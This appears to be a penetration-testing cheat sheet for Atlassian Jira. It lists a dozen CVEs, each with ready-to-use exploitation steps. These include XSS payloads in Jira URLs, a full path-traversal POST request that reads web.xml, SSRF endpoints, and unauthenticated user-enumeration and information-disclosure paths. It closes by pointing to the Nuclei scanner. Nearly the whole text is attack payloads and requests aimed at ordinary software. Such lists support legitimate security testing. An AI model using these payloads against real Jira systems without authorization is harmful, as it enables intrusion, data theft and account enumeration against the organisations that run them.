-
CVE-2019-3402
(XSS)
- 1. Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
- 2. Observe that the payload is getting executed.
-
CVE-2019-3396
(Path Traversal)
- 1. Try Below POST Request with the JIRA Target
- 2. POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close <give an enter and remove this comment>
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
-
CVE-2019-11581
(Template Injection)
- 1. Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
- 2. Try the SSTI Payloads
-
CVE-2020-14179
(Information Disclosure)
- 1. Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
- 2. It leaks information about custom fields, custom SLA, etc.
-
CVE-2020-14178
(Project Key Enumeration)
- 1. Navigate to <JIRA_URL>/browse.<project_key>
- 2. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
-
CVE-2020-14181
(User Enumeration)
- 1. Navigate to <JIRA_URL>/secure/ViewUserHover.jspa?username=<username>
- 2. Observe the response when valid vs. invalid username is provided.
-
CVE-2019-3403
(User Enumeration)
- 1. Navigate to <Jira_URL>/rest/api/2/user/picker?query=<user_name_here>
- 2. Observe the difference in response when valid vs. invalid user is queried.
-
CVE-2019-8442
(Sensitive Information Disclosure)
- 1. Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- 2. Observe that the pom.xml file is accessible.
-
CVE-2019-8449
(User Information Disclosure)
- 1. Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
- 2. Observe that the user related information will be available.
-
CVE-2019-8451
(SSRF)
- 1. Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
-
CVE-2018-20824
(XSS)
- 1. Navigate to <JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
- 2. Observe that the payload will be executed.
-
CVE-2017-9506 (SSRF)
- Navigate to 1. <JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_payload_here>
-
Use Nuclei Scanner by Project Discovery to Automate detecting Most of these CVEs
- MindMap Created By: @harshbothra_